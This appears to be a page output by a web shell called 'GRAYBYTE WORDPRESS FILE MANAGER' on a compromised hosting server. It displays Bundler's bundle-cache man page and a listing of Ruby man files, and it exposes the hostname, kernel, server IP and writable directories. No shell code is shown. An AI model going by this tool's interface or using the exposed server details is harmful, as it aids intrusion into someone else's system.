✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ premium290.web-hosting.com ​🇻​♯➤ 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP 🇾​♯➤ 2025

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 63.250.38.37 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.138
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ 𝗔𝗟𝗟 𝗪𝗢𝗥𝗞𝗜𝗡𝗚....

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /opt/alt/ruby33/share/man/man1//bundle-cache.1
.\" generated with nRonn/v0.11.1
.\" https://github.com/n-ronn/nronn/tree/0.11.1
.TH "BUNDLE\-CACHE" "1" "September 2024" ""
.SH "NAME"
\fBbundle\-cache\fR \- Package your needed \fB\.gem\fR files into your application
.SH "SYNOPSIS"
\fBbundle cache\fR
.P
alias: \fBpackage\fR, \fBpack\fR
.SH "DESCRIPTION"
Copy all of the \fB\.gem\fR files needed to run the application into the \fBvendor/cache\fR directory\. In the future, when running \fBbundle install(1)\fR \fIbundle\-install\.1\.html\fR, use the gems in the cache in preference to the ones on \fBrubygems\.org\fR\.
.SH "GIT AND PATH GEMS"
The \fBbundle cache\fR command can also package \fB:git\fR and \fB:path\fR dependencies besides \.gem files\. This needs to be explicitly enabled via the \fB\-\-all\fR option\. Once used, the \fB\-\-all\fR option will be remembered\.
.SH "SUPPORT FOR MULTIPLE PLATFORMS"
When using gems that have different packages for different platforms, Bundler supports caching of gems for other platforms where the Gemfile has been resolved (i\.e\. present in the lockfile) in \fBvendor/cache\fR\. This needs to be enabled via the \fB\-\-all\-platforms\fR option\. This setting will be remembered in your local bundler configuration\.
.SH "REMOTE FETCHING"
By default, if you run \fBbundle install(1)\fR \fIbundle\-install\.1\.html\fR after running bundle cache(1) \fIbundle\-cache\.1\.html\fR, bundler will still connect to \fBrubygems\.org\fR to check whether a platform\-specific gem exists for any of the gems in \fBvendor/cache\fR\.
.P
For instance, consider this Gemfile(5):
.IP "" 4
.nf
source "https://rubygems\.org"

gem "nokogiri"
.fi
.IP "" 0
.P
If you run \fBbundle cache\fR under C Ruby, bundler will retrieve the version of \fBnokogiri\fR for the \fB"ruby"\fR platform\. If you deploy to JRuby and run \fBbundle install\fR, bundler is forced to check to see whether a \fB"java"\fR platformed \fBnokogiri\fR exists\.
.P
Even though the \fBnokogiri\fR gem for the Ruby platform is \fItechnically\fR acceptable on JRuby, it has a C extension that does not run on JRuby\. As a result, bundler will, by default, still connect to \fBrubygems\.org\fR to check whether it has a version of one of your gems more specific to your platform\.
.P
This problem is also not limited to the \fB"java"\fR platform\. A similar (common) problem can happen when developing on Windows and deploying to Linux, or even when developing on OSX and deploying to Linux\.
.P
If you know for sure that the gems packaged in \fBvendor/cache\fR are appropriate for the platform you are on, you can run \fBbundle install \-\-local\fR to skip checking for more appropriate gems, and use the ones in \fBvendor/cache\fR\.
.P
One way to be sure that you have the right platformed versions of all your gems is to run \fBbundle cache\fR on an identical machine and check in the gems\. For instance, you can run \fBbundle cache\fR on an identical staging box during your staging process, and check in the \fBvendor/cache\fR before deploying to production\.
.P
By default, bundle cache(1) \fIbundle\-cache\.1\.html\fR fetches and also installs the gems to the default location\. To package the dependencies to \fBvendor/cache\fR without installing them to the local install location, you can run \fBbundle cache \-\-no\-install\fR\.
.SH "HISTORY"
In Bundler 2\.1, \fBcache\fR took in the functionalities of \fBpackage\fR and now \fBpackage\fR and \fBpack\fR are aliases of \fBcache\fR\.


Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
12 Jun 2024 7.11 AM
root / root
0755
bundle-add.1
2.495 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-binstubs.1
1.554 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-cache.1
3.363 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-check.1
1.069 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-clean.1
0.709 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-config.1
21.015 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-console.1
1.616 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-doctor.1
1.11 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-exec.1
6.439 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-gem.1
5.477 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-help.1
0.438 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-info.1
0.459 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-init.1
1.123 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-inject.1
0.796 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-install.1
16.432 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-list.1
0.926 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-lock.1
3.068 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-open.1
0.771 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-outdated.1
3.177 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-platform.1
1.386 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-plugin.1
2.111 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-pristine.1
1.615 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-remove.1
0.816 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-show.1
0.661 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-update.1
13.353 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-version.1
0.604 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle-viz.1
1.201 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
bundle.1
3.672 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
erb.1
3.248 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
rake.1
3.638 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
ri.1
5.222 KB
7 Apr 2026 1.52 PM
root / linksafe
0644
ruby.1
21.037 KB
7 Apr 2026 1.52 PM
root / linksafe
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF